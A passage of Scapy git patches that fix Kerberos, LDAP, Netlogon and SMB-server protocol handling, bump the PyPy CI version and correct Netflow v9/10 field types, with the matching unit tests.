Filler # 3. Add first 16 octets of the Wrap token "header" @@ -5142,7 +5151,7 @@ def GSS_Init_sec_context( # Store TGT, self.TGT = res.asrep.ticket self.TGTSessionKey = res.sessionkey - else: + elif self.TGTSessionKey is None: # We have a TGT and were passed its key self.TGTSessionKey = self.KEY @@ -5166,11 +5175,12 @@ def GSS_Init_sec_context( return Context, None, GSS_S_FAILURE # Store the service ticket and associated key - self.ST, Context.STSessionKey = res.tgsrep.ticket, res.sessionkey + Context.ST, Context.STSessionKey = res.tgsrep.ticket, res.sessionkey elif not self.KEY: raise ValueError("Must provide KEY with ST") else: # We were passed a ST and its key + Context.ST = self.ST Context.STSessionKey = self.KEY if Context.flags & GSS_C_FLAGS.GSS_C_DELEG_FLAG: @@ -5179,8 +5189,8 @@ def GSS_Init_sec_context( ) # Save ServerHostname - if len(self.ST.sname.nameString) == 2: - Context.ServerHostname = self.ST.sname.nameString[1].val.decode() + if len(Context.ST.sname.nameString) == 2: + Context.ServerHostname = Context.ST.sname.nameString[1].val.decode() # Build the KRB-AP apOptions = ASN1_BIT_STRING("000") @@ -5191,7 +5201,7 @@ def GSS_Init_sec_context( Context.U2U = True ap_req = KRB_AP_REQ( apOptions=apOptions, - ticket=self.ST, + ticket=Context.ST, authenticator=EncryptedData(), ) @@ -5393,7 +5403,7 @@ def GSS_Accept_sec_context( key=self.KEY, password=self.PASSWORD, ) - self.TGT, self.KEY = res.asrep.ticket, res.sessionkey + self.TGT, self.TGTSessionKey = res.asrep.ticket, res.sessionkey # Server receives AP-req, sends AP-rep if isinstance(input_token, KRB_AP_REQ): diff --git a/scapy/layers/ldap.py b/scapy/layers/ldap.py index 923c54d9281..047ece69199 100644 --- a/scapy/layers/ldap.py +++ b/scapy/layers/ldap.py @@ -83,16 +83,17 @@ from scapy.layers.inet import IP, TCP, UDP from scapy.layers.inet6 import IPv6 from scapy.layers.gssapi import ( + _GSSAPI_Field, ChannelBindingType, - GSSAPI_BLOB, - GSSAPI_BLOB_SIGNATURE, GSS_C_FLAGS, GSS_C_NO_CHANNEL_BINDINGS, + GSS_QOP_REQ_FLAGS, GSS_S_COMPLETE, GSS_S_CONTINUE_NEEDED, + GSSAPI_BLOB_SIGNATURE, + GSSAPI_BLOB, GssChannelBindings, SSP, - _GSSAPI_Field, ) from scapy.layers.netbios import NBTDatagram from scapy.layers.smb import ( @@ -1838,16 +1839,21 @@ def connect( """ self.ssl = use_ssl self.sslcontext = sslcontext + self.timeout = timeout + self.host = host if port is None: if self.ssl: port = 636 else: port = 389 + + # Create and configure socket sock = socket.socket() - self.timeout = timeout - self.host = host + sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1) sock.settimeout(timeout) + + # Connect if self.verb: print( "\u2503 Connecting to %s on port %s%s..." @@ -1864,6 +1870,7 @@ def connect( "\u2514 Connected from %s" % repr(sock.getsockname()) ) ) + # For SSL, build and apply SSLContext if self.ssl: if self.sslcontext is None: @@ -1876,14 +1883,16 @@ def connect( else: context = self.sslcontext sock = context.wrap_socket(sock, server_hostname=sni or host) + # Wrap the socket in a Scapy socket if self.ssl: - self.sock = SSLStreamSocket(sock, LDAP) # Compute the channel binding token (CBT) self.chan_bindings = GssChannelBindings.fromssl( ChannelBindingType.TLS_SERVER_END_POINT, sslsock=sock, ) + + self.sock = SSLStreamSocket(sock, LDAP) else: self.sock = StreamSocket(sock, LDAP) @@ -1891,12 +1900,14 @@ def sr1(self, protocolOp, controls: List[LDAP_Control] = None, **kwargs): self.messageID += 1 if self.verb: print(conf.color_theme.opening(">> %s" % protocolOp.__class__.__name__)) + # Build packet pkt = LDAP( messageID=self.messageID, protocolOp=protocolOp, Controls=controls, ) + # If signing / encryption is used, apply if self.sasl_wrap: pkt = LDAP_SASL_Buffer( @@ -1904,8 +1915,13 @@ def sr1(self, protocolOp, controls: List[LDAP_Control] = None, **kwargs): self.sspcontext, bytes(pkt), conf_req_flag=self.encrypt, + # LDAP on Windows doesn't use SECBUFFER_PADDING, which + # isn't supported by GSS_WrapEx. We add our own flag to + # tell it. + qop_req=GSS_QOP_REQ_FLAGS.GSS_S_NO_SECBUFFER_PADDING, ) ) + # Send / Receive resp = self.sock.sr1( pkt, @@ -1918,6 +1934,7 @@ def sr1(self, protocolOp, controls: List[LDAP_Control] = None, **kwargs): resp.show() print(conf.color_theme.fail("! Got unsolicited notification.")) return resp + # If signing / encryption is used, unpack if self.sasl_wrap: if resp.Buffer: @@ -1929,6 +1946,8 @@ def sr1(self, protocolOp, controls: List[LDAP_Control] = None, **kwargs): ) else: resp = None + + # Verbose display if self.verb: if not resp: print(conf.color_theme.fail("! Bad response.")) @@ -2287,7 +2306,7 @@ def search( controlType="1.2.840.113556.1.4.319", criticality=True, controlValue=LDAP_realSearchControlValue( - size=200, # paging to 200 per 200 + size=100, # paging to 100 per 100 cookie=cookie, ), ) diff --git a/scapy/layers/msrpce/msdcom.py b/scapy/layers/msrpce/msdcom.py index d60bc7ed834..c08de3cf8f7 100644 --- a/scapy/layers/msrpce/msdcom.py +++ b/scapy/layers/msrpce/msdcom.py @@ -16,6 +16,7 @@ import uuid from scapy.config import conf +from scapy.error import log_runtime from scapy.packet import Packet, bind_layers from scapy.fields import ( ConditionalField, @@ -1245,6 +1246,11 @@ def _ChoseRPCBinding(self, bindings: List[STRINGBINDING]): socket.gethostbyname(host) except Exception: # Resolution failed. Skip. + log_runtime.warning( + "Resolution of '%s' failed, check your DNS and default " + "DNS prefix. Kerberos authentication will likely not work." + % host + ) continue # Success diff --git a/scapy/layers/msrpce/msnrpc.py b/scapy/layers/msrpce/msnrpc.py index 1b47623e6ad..187fa286d1d 100644 --- a/scapy/layers/msrpce/msnrpc.py +++ b/scapy/layers/msrpce/msnrpc.py @@ -620,27 +620,33 @@ def create_authenticator(self): """ Create a NETLOGON_AUTHENTICATOR """ - # [MS-NRPC] sect 3.1.4.5 - ts = int(time.time()) - self.ClientStoredCredential = _credentialAddition( - self.ClientStoredCredential, ts - ) - return PNETLOGON_AUTHENTICATOR( - Credential=PNETLOGON_CREDENTIAL( - data=( - ComputeNetlogonCredentialAES( - self.ClientStoredCredential, - self.SessionKey, - ) - if self.supportAES - else ComputeNetlogonCredentialDES( - self.ClientStoredCredential, - self.SessionKey, - ) + if isinstance(self.ssp, NetlogonSSP): + # [MS-NRPC] sect 3.1.4.5 + ts = int(time.time()) + self.ClientStoredCredential = _credentialAddition( + self.ClientStoredCredential, ts + ) + return PNETLOGON_AUTHENTICATOR( + Credential=PNETLOGON_CREDENTIAL( + data=( + ComputeNetlogonCredentialAES( + self.ClientStoredCredential, + self.SessionKey, + ) + if self.supportAES + else ComputeNetlogonCredentialDES( + self.ClientStoredCredential, + self.SessionKey, + ) + ), ), - ), - Timestamp=ts, - ) + Timestamp=ts, + ) + elif isinstance(self.ssp, KerberosSSP): + # Kerberos. This is off spec :( + return PNETLOGON_AUTHENTICATOR() + else: + raise ValueError("Invalid ssp case !") def validate_authenticator(self, auth): """ @@ -648,20 +654,27 @@ def validate_authenticator(self, auth): :param auth: the NETLOGON_AUTHENTICATOR object """ - # [MS-NRPC] sect 3.1.4.5 - self.ClientStoredCredential = _credentialAddition( - self.ClientStoredCredential, 1 - ) - if self.supportAES: - tempcred = ComputeNetlogonCredentialAES( - self.ClientStoredCredential, self.SessionKey + if isinstance(self.ssp, NetlogonSSP): + # [MS-NRPC] sect 3.1.4.5 + self.ClientStoredCredential = _credentialAddition( + self.ClientStoredCredential, 1 ) + if self.supportAES: + tempcred = ComputeNetlogonCredentialAES( + self.ClientStoredCredential, self.SessionKey + ) + else: + tempcred = ComputeNetlogonCredentialDES( + self.ClientStoredCredential, self.SessionKey + ) + if tempcred != auth.Credential.data: + raise ValueError("Server netlogon authenticator is wrong !") + elif isinstance(self.ssp, KerberosSSP): + # Kerberos. This is off spec :( + if bytes(auth) != b"\x00" * 12: + raise ValueError("Server netlogon authenticator is wrong !") else: - tempcred = ComputeNetlogonCredentialDES( - self.ClientStoredCredential, self.SessionKey - ) - if tempcred != auth.Credential.data: - raise ValueError("Server netlogon authenticator is wrong !") + raise ValueError("Invalid ssp case !") def establish_secure_channel( self, @@ -879,6 +892,3 @@ def establish_secure_channel( # An error occurred netr_server_authkerb_response.show() raise ValueError("NetrServerAuthenticateKerberos failed !") - - # The NRPC session key is in this case the kerberos one - self.SessionKey = self.sspcontext.SessionKey diff --git a/scapy/layers/smbserver.py b/scapy/layers/smbserver.py index 99c6ba7d89f..784f791b5ec 100644 --- a/scapy/layers/smbserver.py +++ b/scapy/layers/smbserver.py @@ -33,6 +33,7 @@ from scapy.layers.dcerpc import ( DCERPC_Transport, NDRUnion, + NDRPointer, ) from scapy.layers.gssapi import ( GSS_S_COMPLETE, @@ -1658,46 +1659,74 @@ def netr_share_enum(self, req): NetrShareEnum [MS-SRVS] "retrieves information about each shared resource on a server." """ - nbEntries = len(self.shares) - return NetrShareEnum_Response( + level = req.InfoStruct.Level + + # Create response + resp = NetrShareEnum_Response( InfoStruct=LPSHARE_ENUM_STRUCT( - Level=1, + Level=level, ShareInfo=NDRUnion( - tag=1, - value=SHARE_INFO_1_CONTAINER( - Buffer=[ - # Add shares - LPSHARE_INFO_1( - shi1_netname=x.name, - shi1_type=x.type, - shi1_remark=x.remark, - ) - for x in self.shares - ], - EntriesRead=nbEntries, - ), + tag=level, + value=None, ), ), - TotalEntries=nbEntries, ndr64=self.ndr64, ) + if level == 1: + nbEntries = len(self.shares) + resp.InfoStruct.ShareInfo.value = NDRPointer( + referent_id=0x20000, + value=SHARE_INFO_1_CONTAINER( + Buffer=[ + # Add shares + LPSHARE_INFO_1( + shi1_netname=x.name, + shi1_type=x.type, + shi1_remark=x.remark, + ) + for x in self.shares + ], + EntriesRead=nbEntries, + ), + ) + resp.TotalEntries = nbEntries + else: + # We only support level 1 :( + resp.status = 0x0000007C # ERROR_INVALID_LEVEL + + return resp + @DCERPC_Server.answer(NetrWkstaGetInfo_Request) def netr_wksta_getinfo(self, req): """ NetrWkstaGetInfo [MS-SRVS] "returns information about the configuration of a workstation." """ - return NetrWkstaGetInfo_Response( + level = req.Level + + # Create response + resp = NetrWkstaGetInfo_Response( WkstaInfo=NDRUnion( - tag=100, + tag=level, + value=None, + ), + ndr64=self.ndr64, + ) + + if level == 100: + resp.WkstaInfo.value = NDRPointer( + referent_id=0x20000, value=LPWKSTA_INFO_100( wki100_platform_id=500, # NT wki100_ver_major=5, ), - ), - ndr64=self.ndr64, - ) + ) + else: + # We only support level 101 :( + resp.status = 0x0000007C # ERROR_INVALID_LEVEL + + return resp @DCERPC_Server.answer(NetrServerGetInfo_Request) def netr_server_getinfo(self, req): @@ -1706,38 +1735,75 @@ def netr_server_getinfo(self, req): "retrieves current configuration information for CIFS and SMB Version 1.0 servers." """ - return NetrServerGetInfo_Response( - ServerInfo=NDRUnion( - tag=101, - value=LPSERVER_INFO_101( - sv101_platform_id=500, # NT - sv101_name=req.ServerName.value.value[0].value, - sv101_version_major=6, - sv101_version_minor=1, - sv101_type=1, # Workstation - ), + level = req.Level + + # Create response + resp = NetrServerGetInfo_Response( + InfoStruct=NDRUnion( + tag=level, + value=None, ), ndr64=self.ndr64, ) + if level == 101: + resp.InfoStruct.value = NDRPointer( + referent_id=0x20000, + value=LPSERVER_INFO_101( + sv101_platform_id=500, # NT + sv101_name="WORKSTATION", + sv101_version_major=10, + sv101_version_minor=0, + sv101_version_type=1, # Workstation + ), + ) + else: + # We only support level 101 :( + resp.status = 0x0000007C # ERROR_INVALID_LEVEL + + return resp + @DCERPC_Server.answer(NetrShareGetInfo_Request) def netr_share_getinfo(self, req): """ NetrShareGetInfo [MS-SRVS] "retrieves information about a particular shared resource on a server." """ - return NetrShareGetInfo_Response( - ShareInfo=NDRUnion( - tag=1, - value=LPSHARE_INFO_1( - shi1_netname=req.NetName.value[0].value, - shi1_type=0, - shi1_remark=b"", - ), + level = req.Level + share_netname = req.payload.payload.valueof("NetName").decode() + + # Create response + resp = NetrShareGetInfo_Response( + InfoStruct=NDRUnion( + tag=level, + value=None, ), ndr64=self.ndr64, ) + # Find the share the client is asking details for + try: + share = next(x for x in self.shares if x.name == share_netname) + except StopIteration: + # Share doesn't exist ! + resp.status = 0x00000906 # NERR_NetNameNotFound + return resp + + if level == 1: + resp.InfoStruct.value = NDRPointer( + referent_id=0x20000, + value=LPSHARE_INFO_1( + shi1_netname=share.name, + shi1_type=share.type, + shi1_remark=share.remark, + ), + ) + else: + # We only support level 1 :( + resp.status = 0x0000007C # ERROR_INVALID_LEVEL + + return resp + # Util diff --git a/scapy/layers/windows/erref.py b/scapy/layers/windows/erref.py index ba17053ce12..b18cacf769e 100644 --- a/scapy/layers/windows/erref.py +++ b/scapy/layers/windows/erref.py @@ -17,6 +17,7 @@ 0x00000011: "ERROR_NOT_SAME_DEVICE", 0x00000013: "ERROR_WRITE_PROTECT", 0x00000057: "ERROR_INVALID_PARAMETER", + 0xC000006A: "STATUS_WRONG_PASSWORD", 0x0000007A: "ERROR_INSUFFICIENT_BUFFER", 0x0000007B: "ERROR_INVALID_NAME", 0x000000A1: "ERROR_BAD_PATHNAME", diff --git a/scapy/modules/ldaphero.py b/scapy/modules/ldaphero.py index 8842cf3b593..1a43e55ec66 100644 --- a/scapy/modules/ldaphero.py +++ b/scapy/modules/ldaphero.py @@ -149,7 +149,7 @@ class LDAPHero: def __init__( self, ssp: SSP = None, - mech: LDAP_BIND_MECHS = None, + mech: LDAP_BIND_MECHS = LDAP_BIND_MECHS.SASL_GSS_SPNEGO, sign: bool = True, encrypt: bool = False, host: str = None, @@ -165,15 +165,9 @@ def __init__( use_krb5ccname: bool = False, ): self.client = LDAP_Client() - if ( - ssp is None - and mech in [None, LDAP_BIND_MECHS.SASL_GSS_SPNEGO] - and UPN - and host - ): + if ssp is None and mech == LDAP_BIND_MECHS.SASL_GSS_SPNEGO and UPN and host: # We allow the SSP to be provided through arguments. # In that case, use SPNEGO - mech = LDAP_BIND_MECHS.SASL_GSS_SPNEGO ssp = SPNEGOSSP.from_cli_arguments( UPN=UPN, target=host, @@ -470,6 +464,7 @@ def bindtypechange(*args, **kwargs): elif bindtype == LDAP_BIND_MECHS.SICILY: domentry.config(state=tk.DISABLED) signbtn.config(state=tk.DISABLED) + signv.set(False) encrbtn.config(state=tk.NORMAL) else: domentry.config(state=tk.NORMAL, textvariable=domainv) diff --git a/test/scapy/layers/msrpce/msnrpc.uts b/test/scapy/layers/msrpce/msnrpc.uts index f678d7f6274..c4ca0829d4e 100644 --- a/test/scapy/layers/msrpce/msnrpc.uts +++ b/test/scapy/layers/msrpce/msnrpc.uts @@ -503,3 +503,39 @@ try: assert False, "No error was reported, but there should have been one" except ValueError: pass + += [NetlogonClient] - Build and validate authenticator - Netlogon SSP + +from unittest import mock +from scapy.layers.msrpce.msnrpc import NetlogonClient, NetlogonSSP + +client = NetlogonClient() +client.SessionKey = b'\xec\xee\xda\xb70\xdeQ\x98\xa4\xceDErt\xcem' +client.ssp = NetlogonSSP(client.SessionKey, "WKS01", "DOMAIN") +client.ClientStoredCredential = b'\xf8\x890D\x1b_\xf2x' + +# Build +with mock.patch('scapy.layers.msrpce.msnrpc.time.time', side_effect=lambda: 1773509346): + authenticator = client.create_authenticator() + assert authenticator.Timestamp == 1773509346 + assert bytes(authenticator) == b'a\x18\xa3\xebu`3\x84\xe2\x9a\xb5i' + +# Verify +authenticator = PNETLOGON_AUTHENTICATOR(b'`6n\xd0\x80\x91"\x06\x00\x00\x00\x00') +client.validate_authenticator(authenticator) + += [NetlogonClient] - Build and validate authenticator - Kerberos SSP + +from scapy.layers.msrpce.msnrpc import NetlogonClient, PNETLOGON_AUTHENTICATOR +from scapy.layers.kerberos import KerberosSSP + +client = NetlogonClient() +client.ssp = KerberosSSP(UPN="WKS01@DOMAIN", PASSWORD="Password") + +# Build +authenticator = client.create_authenticator() +assert bytes(authenticator) == b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + +# Verify +authenticator = PNETLOGON_AUTHENTICATOR(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +client.validate_authenticator(authenticator) From e3273c44bbf8c55969ae00328919c183efce174a Mon Sep 17 00:00:00 2001 From: Gabriel <10530980+gpotter2@users.noreply.github.com> Date: Sat, 14 Mar 2026 18:55:38 +0100 Subject: [PATCH 1611/1632] Upgrade PyPy version from 3.10 to 3.11 --- .github/workflows/unittests.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index 9d175f35bb4..5e8873e3142 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -101,7 +101,7 @@ jobs: flags: " -K scanner" # PyPy tests: root only - os: ubuntu-latest - python: "pypy3.10" + python: "pypy3.11" mode: root flags: " -K scanner" # Libpcap test @@ -127,7 +127,7 @@ jobs: allow-failure: 'true' flags: " -k scanner" - os: ubuntu-latest - python: "pypy3.10" + python: "pypy3.11" mode: root flags: " -k scanner" - os: macos-14 From 2cb8101e18c5d06672f02e0369b0113a67e34f44 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Marc=20Su=C3=B1=C3=A9?= Date: Sat, 14 Mar 2026 20:58:52 +0100 Subject: [PATCH 1612/1632] Netflow: NFv9/10 flow record type fix (#4813) * layers/netflow: NFv9/10 flow record type fix This commit fixes the Python types of a number of fields defined in Netflowv9/10 for the following pre-defined fields (mostly the ones in RFC3954 https://datatracker.ietf.org/doc/html/rfc3954). It appears that in absence of an assigned field type, it defaults to BytesField instead of IntField. Fields: * IN_BYTES, IN_PKTS, OUT_BYTES, OUT_PKTS: IntField (4 bytes). Please note code doesn't seem to support the larget 8byte optional length. * MUL_DST_PKTS, MUL_DST_BYTES: same as above * INPUT_SNMP, OUTPUT_SNMP: ShortField (2 bytes), iface index. Note: code doesn't seem to support optional larger values (undefined max. length, but 8 bytes might be sufficient). Note there are _many_ other field types defined that are not part of the spec / unknown without field type and length. Fixes #4810 Signed-off-by: Marc Sune * layers/netflow: delete print() _GenNetflowRecordV9 Remove unnecessary `print()` in _GenNetflowRecordV9(). Fixes #4810 Signed-off-by: Marc Sune * Update to support isint parameter * Fix tests with the changes * Fix PEP8 issues * Unrelated debug fix --------- Signed-off-by: Marc Sune Co-authored-by: gpotter2 <10530980+gpotter2@users.noreply.github.com> --- scapy/layers/netflow.py | 85 +++++++++++++++++++++++++---------- test/regression.uts | 1 + test/scapy/layers/netflow.uts | 83 +++++++++++++++++++++++++--------- 3 files changed, 124 insertions(+), 45 deletions(-) diff --git a/scapy/layers/netflow.py b/scapy/layers/netflow.py index ef0fe8e9646..04d8e9fbac2 100644 --- a/scapy/layers/netflow.py +++ b/scapy/layers/netflow.py @@ -28,6 +28,8 @@ >>> sniff(session=NetflowSession, prn=[...]) +.. note:: You will find more examples over + https://scapy.readthedocs.io/en/latest/layers/netflow.html """ import dataclasses @@ -48,10 +50,11 @@ Field, FieldLenField, FlagsField, - IPField, IntField, + IPField, LongField, MACField, + NBytesField, PacketListField, SecondsIntField, ShortEnumField, @@ -203,6 +206,7 @@ class _N910F: length: int = 0 field: Field = None kwargs: Dict[str, Any] = dataclasses.field(default_factory=dict) + isint: bool = False # NetflowV9 Ready-made fields @@ -260,8 +264,10 @@ def __init__(self, name, default, *args, **kargs): NTOP_BASE = 57472 NetflowV910TemplateFields = { - 1: _N910F("IN_BYTES", length=4), - 2: _N910F("IN_PKTS", length=4), + 1: _N910F("IN_BYTES", length=4, + isint=True), + 2: _N910F("IN_PKTS", length=4, + isint=True), 3: _N910F("FLOWS", length=4), 4: _N910F("PROTOCOL", length=1, field=ByteEnumField, kwargs={"enum": IP_PROTOS}), @@ -275,14 +281,16 @@ def __init__(self, name, default, *args, **kargs): field=IPField), 9: _N910F("SRC_MASK", length=1, field=ByteField), - 10: _N910F("INPUT_SNMP"), + 10: _N910F("INPUT_SNMP", + isint=True), 11: _N910F("L4_DST_PORT", length=2, field=ShortField), 12: _N910F("IPV4_DST_ADDR", length=4, field=IPField), 13: _N910F("DST_MASK", length=1, field=ByteField), - 14: _N910F("OUTPUT_SNMP"), + 14: _N910F("OUTPUT_SNMP", + isint=True), 15: _N910F("IPV4_NEXT_HOP", length=4, field=IPField), 16: _N910F("SRC_AS", length=2, @@ -291,16 +299,20 @@ def __init__(self, name, default, *args, **kargs): field=ShortOrInt), 18: _N910F("BGP_IPV4_NEXT_HOP", length=4, field=IPField), - 19: _N910F("MUL_DST_PKTS", length=4), - 20: _N910F("MUL_DST_BYTES", length=4), + 19: _N910F("MUL_DST_PKTS", length=4, + isint=True), + 20: _N910F("MUL_DST_BYTES", length=4, + isint=True), 21: _N910F("LAST_SWITCHED", length=4, field=SecondsIntField, kwargs={"use_msec": True}), 22: _N910F("FIRST_SWITCHED", length=4, field=SecondsIntField, kwargs={"use_msec": True}), - 23: _N910F("OUT_BYTES", length=4), - 24: _N910F("OUT_PKTS", length=4), + 23: _N910F("OUT_BYTES", length=4, + isint=True), + 24: _N910F("OUT_PKTS", length=4, + isint=True), 25: _N910F("IP_LENGTH_MINIMUM"), 26: _N910F("IP_LENGTH_MAXIMUM"), 27: _N910F("IPV6_SRC_ADDR", length=16, @@ -329,9 +341,12 @@ def __init__(self, name, default, *args, **kargs): field=ByteField), 39: _N910F("ENGINE_ID", length=1, field=ByteField), - 40: _N910F("TOTAL_BYTES_EXP", length=4), - 41: _N910F("TOTAL_PKTS_EXP", length=4), - 42: _N910F("TOTAL_FLOWS_EXP", length=4), + 40: _N910F("TOTAL_BYTES_EXP", length=4, + isint=True), + 41: _N910F("TOTAL_PKTS_EXP", length=4, + isint=True), + 42: _N910F("TOTAL_FLOWS_EXP", length=4, + isint=True), 43: _N910F("IPV4_ROUTER_SC"), 44: _N910F("IP_SRC_PREFIX"), 45: _N910F("IP_DST_PREFIX"), @@ -376,16 +391,26 @@ def __init__(self, name, default, *args, **kargs): 63: _N910F("BGP_IPV6_NEXT_HOP", length=16, field=IP6Field), 64: _N910F("IPV6_OPTION_HEADERS", length=4), - 70: _N910F("MPLS_LABEL_1", length=3), - 71: _N910F("MPLS_LABEL_2", length=3), - 72: _N910F("MPLS_LABEL_3", length=3), - 73: _N910F("MPLS_LABEL_4", length=3), - 74: _N910F("MPLS_LABEL_5", length=3), - 75: _N910F("MPLS_LABEL_6", length=3), - 76: _N910F("MPLS_LABEL_7", length=3), - 77: _N910F("MPLS_LABEL_8", length=3), - 78: _N910F("MPLS_LABEL_9", length=3), - 79: _N910F("MPLS_LABEL_10", length=3), + 70: _N910F("MPLS_LABEL_1", length=3, + field=ThreeBytesField), + 71: _N910F("MPLS_LABEL_2", length=3, + field=ThreeBytesField), + 72: _N910F("MPLS_LABEL_3", length=3, + field=ThreeBytesField), + 73: _N910F("MPLS_LABEL_4", length=3, + field=ThreeBytesField), + 74: _N910F("MPLS_LABEL_5", length=3, + field=ThreeBytesField), + 75: _N910F("MPLS_LABEL_6", length=3, + field=ThreeBytesField), + 76: _N910F("MPLS_LABEL_7", length=3, + field=ThreeBytesField), + 77: _N910F("MPLS_LABEL_8", length=3, + field=ThreeBytesField), + 78: _N910F("MPLS_LABEL_9", length=3, + field=ThreeBytesField), + 79: _N910F("MPLS_LABEL_10", length=3, + field=ThreeBytesField), 80: _N910F("DESTINATION_MAC"), 81: _N910F("SOURCE_MAC"), 82: _N910F("IF_NAME"), @@ -1329,28 +1354,40 @@ def i2repr(self, pkt, v): def _GenNetflowRecordV9(cls, lengths_list): - """Internal function used to generate the Records from + """ + Internal function used to generate the Records from their template. """ _fields_desc = [] for j, k in lengths_list: + # For each field, if it's known in our template list, + # try to make a nice field for it. Otherwise use an integer + # or a string default. _f_type = None _f_kwargs = {} + _f_isint = False if k in NetflowV910TemplateFields: _f = NetflowV910TemplateFields[k] _f_type = _f.field _f_kwargs = _f.kwargs + _f_isint = _f.isint if _f_type: if issubclass(_f_type, _AdjustableNetflowField): _f_kwargs["length"] = j - print(k, _f_kwargs) _fields_desc.append( _f_type( NetflowV910TemplateFieldTypes.get(k, "unknown_data"), 0, **_f_kwargs ) ) + elif _f_isint: + _fields_desc.append( + NBytesField( + NetflowV910TemplateFieldTypes.get(k, "unknown_data"), + 0, sz=j + ) + ) else: _fields_desc.append( _CustomStrFixedLenField( diff --git a/test/regression.uts b/test/regression.uts index 4beb41787ac..af7738a41e0 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -952,6 +952,7 @@ assert sane(corrupt_bits("ABCDE", n=3)) in ["AF.EE", "QB.TE"] if not WINDOWS: result = whois("193.0.6.139") + print(result) assert b"inetnum" in result and b"Amsterdam" in result = Test manuf DB methods diff --git a/test/scapy/layers/netflow.uts b/test/scapy/layers/netflow.uts index 5ad94a68feb..2f78de78759 100644 --- a/test/scapy/layers/netflow.uts +++ b/test/scapy/layers/netflow.uts @@ -64,7 +64,7 @@ assert nfv9_options_fl[NetflowOptionsFlowsetV9].options[0].optionFieldType == 36 nfv9_options_ds = a[4] assert NetflowDataflowsetV9 in nfv9_options_ds assert isinstance(nfv9_options_ds.records[0], NetflowOptionsRecordScopeV9) -assert nfv9_options_ds.records[0].IN_BYTES == b'\x01\x00\x00\x00' +assert nfv9_options_ds.records[0].IN_BYTES == 0x01000000 assert nfv9_options_ds.records[1].SAMPLING_INTERVAL == 12 assert nfv9_options_ds.records[1].SAMPLING_ALGORITHM == 0x2 @@ -114,8 +114,8 @@ dataFS = NetflowDataflowsetV9( templateID=256, records=[ # Some random data. recordClass( - IN_BYTES=b"\x12", - IN_PKTS=b"\0\0\0\0", + IN_BYTES=0x12, + IN_PKTS=0, PROTOCOL=6, IPV4_SRC_ADDR="192.168.0.10", IPV4_DST_ADDR="192.168.0.11" @@ -144,7 +144,7 @@ dataflowset = NetflowDataflowsetV9(records=[NetflowRecordV9(fieldValue=b'\x14\x0 pkt = netflowv9_defragment(list(header/flowset/dataflowset))[0] assert pkt.records[0].IPV4_NEXT_HOP == "10.100.103.1" -assert pkt.records[0].OUTPUT_SNMP == b'\x00\x00\x02\xfb' +assert pkt.records[0].OUTPUT_SNMP == 0x000002fb assert raw(pkt) == b'\xaa\xaa\xaa\xaa\xaa\xaa\x00\x00\x00\x00\x00\x00\x08\x00E\x00\x00\xcc\x00\x01\x00\x00@\x11|\x1e\x7f\x00\x00\x01\x7f\x00\x00\x01\x08\x07\x08\x07\x00\xb8\x86\xe7\x00\t\x00\x02\x00\x00\x00\x00\\C\x7f5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\\\x01\xa8\x00\x15\x00\x08\x00\x04\x00\x0c\x00\x04\x00\x05\x00\x01\x00\x04\x00\x01\x00\x07\x00\x02\x00\x0b\x00\x02\x00 \x00\x02\x00\n\x00\x04\x00\x10\x00\x04\x00\x11\x00\x04\x00\x12\x00\x04\x00\x0e\x00\x04\x00\x01\x00\x04\x00\x02\x00\x04\x00\x16\x00\x04\x00\x15\x00\x04\x00\x0f\x00\x04\x00\t\x00\x01\x00\r\x00\x01\x00\x06\x00\x01\x00<\x00\x01\x01\xa8\x00@\x14\x00\x00\xfd\x1e\x00\x00\xfd\x00\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x03 \x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x02\xfb\x00\x15a|\x00\x00\x07\x0f$\x95x\xed$\x99\x91<\ndg\x01 \x00\x04' @@ -210,36 +210,36 @@ dataFlowset_1 = NetflowDataflowsetV9( templateID=256, records=[ Record256( - IN_BYTES=b"\x12", - IN_PKTS=b"\0\0\0\0", + IN_BYTES=0x12, + IN_PKTS=0, PROTOCOL=1, IPV4_SRC_ADDR="192.168.0.10", IPV4_DST_ADDR="192.168.0.11" ), Record256( - IN_BYTES=b"\x0c", - IN_PKTS=b"\1\1\1\1", + IN_BYTES=0x0c, + IN_PKTS=0x01010101, PROTOCOL=2, IPV4_SRC_ADDR="172.0.0.10", IPV4_DST_ADDR="172.0.0.11" ), Record256( - IN_BYTES=b"\x0c", - IN_PKTS=b"\1\1\1\1", + IN_BYTES=0x0c, + IN_PKTS=0x01010101, PROTOCOL=3, IPV4_SRC_ADDR="172.0.0.10", IPV4_DST_ADDR="172.0.0.11" ), Record256( - IN_BYTES=b"\x0c", - IN_PKTS=b"\1\1\1\1", + IN_BYTES=0x0c, + IN_PKTS=0x01010101, PROTOCOL=4, IPV4_SRC_ADDR="172.0.0.10", IPV4_DST_ADDR="172.0.0.11" ), Record256( - IN_BYTES=b"\x0c", - IN_PKTS=b"\1\1\1\1", + IN_BYTES=0x0c, + IN_PKTS=0x01010101, PROTOCOL=5, IPV4_SRC_ADDR="172.0.0.10", IPV4_DST_ADDR="172.0.0.11" @@ -251,15 +251,15 @@ dataFlowset_2 = NetflowDataflowsetV9( templateID=257, records=[ Record257( - IN_BYTES=b"\x12", - IN_PKTS=b"\0\0\0\0", + IN_BYTES=0x12, + IN_PKTS=0, PROTOCOL=1, IPV6_SRC_ADDR="2001:db8:3333:4444:5555:6666:7777:8888", IPV6_DST_ADDR="2001:db8::" ), Record257( - IN_BYTES=b"\x0c", - IN_PKTS=b"\1\1\1\1", + IN_BYTES=0x0c, + IN_PKTS=0x01010101, PROTOCOL=2, IPV6_SRC_ADDR="2001:db8:3333:4444:CCCC:DDDD:EEEE:FFFF", IPV6_DST_ADDR="2001:db8::" @@ -400,7 +400,7 @@ pkt = netflowv9_defragment(Ether(s))[0] for i in range(1,3): assert pkt.getlayer(NetflowDataflowsetV9, i).templateID == 257 - assert pkt.getlayer(NetflowDataflowsetV9, i).records[0].IN_PKTS == b'\x00\x00\x00\x00' + assert 